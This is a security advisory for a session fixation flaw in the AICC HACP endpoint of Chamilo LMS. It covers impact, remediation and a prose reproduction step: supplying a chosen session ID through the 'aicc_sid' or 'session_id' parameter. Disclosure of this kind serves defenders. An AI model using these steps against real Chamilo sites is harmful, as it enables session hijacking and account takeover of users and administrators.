Chamilo LMS Session Fixation Vulnerability in AICC HACP Endpoint

A session fixation vulnerability has been identified in Chamilo LMS versions prior to 1.11.38 and 2.0.0-RC.3. The issue arises in the AICC HACP endpoint, where user-controlled request parameters are directly used to set the PHP session ID before the global bootstrap is loaded. This allows an attacker to predefine a session ID and potentially hijack a user's session, leading to account takeover.

Impact

Exploitation of this vulnerability allows for session hijacking, with an associated account takeover. If the compromised account belongs to an administrator, it could result in privilege escalation.

Reproduction

To reproduce this vulnerability, send a request to the AICC HACP endpoint with a custom session ID in the 'aicc_sid' or 'session_id' parameter. The server will accept the custom session ID and use it for the PHP session, bypassing normal authentication checks. This can be done anonymously, allowing for session fixation without user credentials.

Remediation

Users can upgrade to Chamilo LMS versions 1.11.38 or 2.0.0-RC.3, where this vulnerability has been patched. For those unable to upgrade, it's recommended to disable AICC support functionality.